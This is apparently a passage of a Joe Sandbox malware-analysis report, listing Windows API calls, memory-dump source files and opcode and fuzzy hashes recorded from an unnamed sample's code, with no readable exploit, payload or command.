                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 919efc53e760fa7f4dd07e2682b398e1deffa067ffedde59401bac2f256686f7
                                                                                                                      • Instruction ID: 374057bd978a73acce873f95edcede112e8eff4a2948ce1f533f3a094eaaf6bf
                                                                                                                      • Opcode Fuzzy Hash: 919efc53e760fa7f4dd07e2682b398e1deffa067ffedde59401bac2f256686f7
                                                                                                                      • Instruction Fuzzy Hash: 4F019270244308BEF3354E24CC8AF663BDCEB46768F108319BAE45A1E0C6F45C458B24
                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,003EAEA5,?,?,00000000,00000008), ref: 003BF282
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,003EAEA5,?,?,00000000,00000008), ref: 003BF2A6
                                                                                                                        • Part of subcall function 003BF2D0: _memmove.LIBCMT ref: 003BF307
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3033907384-0
                                                                                                                      • Opcode ID: 925d0dfb8063db42a4d5cb63133acdeedd3f5657370fa0e7ddb86c1e4dcfb477
                                                                                                                      • Instruction ID: d0ebfc716ea5fac774d7141648b98c727b80003aa9b65b0f887abfeec04bb3f1
                                                                                                                      • Opcode Fuzzy Hash: 925d0dfb8063db42a4d5cb63133acdeedd3f5657370fa0e7ddb86c1e4dcfb477
                                                                                                                      • Instruction Fuzzy Hash: 25F04FBA504114BFAB16AB65DC44DBB7FADEF8A3647408426FE08CE515CA31DC018774
                                                                                                                      APIs
                                                                                                                      • ___lock_fhandle.LIBCMT ref: 003CF7D9
                                                                                                                      • __close_nolock.LIBCMT ref: 003CF7F2
                                                                                                                        • Part of subcall function 003C886A: __getptd_noexit.LIBCMT ref: 003C886A
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1046115767-0
                                                                                                                      • Opcode ID: bb67e52905545ac3b4931a286d76a6ed7d60b1ab92af3e989ab34cf61a5c613c
                                                                                                                      • Instruction ID: cf8dbf490989639535942dfdeca42117201de09a5bb631a95cc28f966375d84d
                                                                                                                      • Opcode Fuzzy Hash: bb67e52905545ac3b4931a286d76a6ed7d60b1ab92af3e989ab34cf61a5c613c
                                                                                                                      • Instruction Fuzzy Hash: D111C272805B148ED7137F64D842B597A625F41331F66036CE920DF1E3CBB89E018BA5
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003A352A
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • _wcscat.LIBCMT ref: 004166C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FullNamePath_memmove_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 257928180-0
                                                                                                                      • Opcode ID: 4f35c80d8c1d8e47b10e304dd71b5634beff20aa9d70a4769dfaa430f9ee3d74
                                                                                                                      • Instruction ID: 3c18c1d1d3413175b7a8160ccc6d1c35bae0d566066c1dde9c9ce034d5ec7307
                                                                                                                      • Opcode Fuzzy Hash: 4f35c80d8c1d8e47b10e304dd71b5634beff20aa9d70a4769dfaa430f9ee3d74
                                                                                                                      • Instruction Fuzzy Hash: E901C43190410C9ACB01EBA4C846EDA73BCEF16348F0041A6B915D71A0EF309B858B95
                                                                                                                      APIs
                                                                                                                      • send.WS2_32(00000000,?,00000000,00000000), ref: 003F9534
                                                                                                                      • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 003F9557
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastsend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1802528911-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      • __lock_file.LIBCMT ref: 003C42B9
                                                                                                                        • Part of subcall function 003C5A9F: __lock.LIBCMT ref: 003C5AC2
                                                                                                                      • __fclose_nolock.LIBCMT ref: 003C42C4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2800547568-0
                                                                                                                      APIs
                                                                                                                      • closesocket.WS2_32(00000000), ref: 003F90E7
                                                                                                                      • WSAGetLastError.WS2_32(00000000), ref: 003F90F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastclosesocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1278161333-0
                                                                                                                      APIs
                                                                                                                      • timeGetTime.WINMM ref: 003BF57A
                                                                                                                        • Part of subcall function 003AE1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003AE279
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 004175D3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePeekSleepTimetime
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1792118007-0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      APIs
                                                                                                                      • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 003A4F8F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 973152223-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: select
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1274211008-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: c9ede23ca696f428ef9a0a92b528895e2206a08879611a576bd0fad7fed57aca
                                                                                                                      • Instruction ID: b5ba693de54c06c0822b5e9b1324981743650701bbba0a2ba4f6e085471ac5eb
                                                                                                                      • Opcode Fuzzy Hash: c9ede23ca696f428ef9a0a92b528895e2206a08879611a576bd0fad7fed57aca
                                                                                                                      • Instruction Fuzzy Hash: 6C415D74504651CFEB29CF18C444B5ABBE1BF45308F19856CEA954B762C335EC85CF52
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 9f6308509cdf7f2a2ba2c89a5e41b5e5d6584e104664498f8cce402877605e32
                                                                                                                      • Instruction ID: 6d307043222833b0b7817603225b44cee80a09ddea2f965d3eaea609c142f147
                                                                                                                      • Opcode Fuzzy Hash: 9f6308509cdf7f2a2ba2c89a5e41b5e5d6584e104664498f8cce402877605e32
                                                                                                                      • Instruction Fuzzy Hash: 3D210270600B08EBCB149F51E940AA97FF8FB97340F22842EE496D6051EB70D5D0C759
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                      • Instruction ID: c35f9c9b4a10b3d7f9882c1c3ca714c2e63ab506ca6eb28642201daa072ac8a0
                                                                                                                      • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                                                                                                                      • Instruction Fuzzy Hash: 24114C75600601DFC725DF28D581A16F7E9FF49314720842EE88ACBA61E732E841CB50
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 003A3F90
                                                                                                                        • Part of subcall function 003C4129: __wfsopen.LIBCMT ref: 003C4134
                                                                                                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003A34E2,?,00000001), ref: 003A3FCD
                                                                                                                        • Part of subcall function 003A3E78: FreeLibrary.KERNEL32(00000000), ref: 003A3EAB
                                                                                                                        • Part of subcall function 003A4010: _memmove.LIBCMT ref: 003A405A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1396898556-0
                                                                                                                      • Opcode ID: 2d302133428bbe2f35f2b112e6390cb854e6817e81b2b7e36597ba82a277a285
                                                                                                                      • Instruction ID: 1be0a60d6b40323e8e31c1dde97da1cd3e3f0b2ed3d61759f487dadf235ea468
                                                                                                                      • Opcode Fuzzy Hash: 2d302133428bbe2f35f2b112e6390cb854e6817e81b2b7e36597ba82a277a285
                                                                                                                      • Instruction Fuzzy Hash: D911E332610205AACB22BB64DC03F9E77A9DF81700F208829F542EA1C1DBB49E41AB54
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: e3d435e1439e11f757040b9c5a820c35f7275b47ec3d1ef97b8ab3b36940d49e
                                                                                                                      • Instruction ID: ff5b69344d849598f561ffc2aa64cabdb1cdf8b918a7fbd6b67d84716f177ace
                                                                                                                      • Opcode Fuzzy Hash: e3d435e1439e11f757040b9c5a820c35f7275b47ec3d1ef97b8ab3b36940d49e
                                                                                                                      • Instruction Fuzzy Hash: 31212774508641CFE72ADF68C444B5BBBE1BF89308F15496CEA964BA32C731E885CF52
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: a2924769b10aadd6922bb075493e8d070a54630f8c62da7c8f66a8d023fef1a0
                                                                                                                      • Instruction ID: 06e9266bf133038df3f3d24447509ea1f7523fe0c59bead827ead6444097d183
                                                                                                                      • Opcode Fuzzy Hash: a2924769b10aadd6922bb075493e8d070a54630f8c62da7c8f66a8d023fef1a0
                                                                                                                      • Instruction Fuzzy Hash: B3118F363012159FDB25DF19C4809DAB7A5FF4D720B05817AFE459F3A1CB34AC418B95
                                                                                                                      APIs
                                                                                                                      • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,003A4E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 003A4CF7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: 3faa2159fe6593a4c912d103f12e9d173b3838b5c29c965dd5d4bf61ce851696
                                                                                                                      • Instruction ID: 24b6326865a3d96cc92cf17c10cc7fb294c397806a2394b71e468e8dc8347d64
                                                                                                                      • Opcode Fuzzy Hash: 3faa2159fe6593a4c912d103f12e9d173b3838b5c29c965dd5d4bf61ce851696
                                                                                                                      • Instruction Fuzzy Hash: CE113C31201745AFD722CF16C880F66B7E9EF85764F10C52DE59A86A51C7B1F845CB60
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                      • Instruction ID: c131b4e9f9b6faef8c0f3404fb8c5f9bfe834aa2cb8750317601e738f876cc8a
                                                                                                                      • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                      • Instruction Fuzzy Hash: 98017175200541AFC3069B28C951D39F7AAFF963107148159E519CB702CB70AC21CBE0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                      • Instruction ID: 356723eff408c5653d345aae9d2206fc4b35e1c51fc5c6e529aead53f519721a
                                                                                                                      • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                      • Instruction Fuzzy Hash: CB01D672214705AED3169B39CC07F66BBD8DF45760F50852EF95ACA5D1EB72E4008B60
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4104443479-0
                                                                                                                      • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                      • Instruction ID: ecaae0b332a0e0d53d27d89a8677ee6a03bf667088c93015efd80924fe9082a8
                                                                                                                      • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
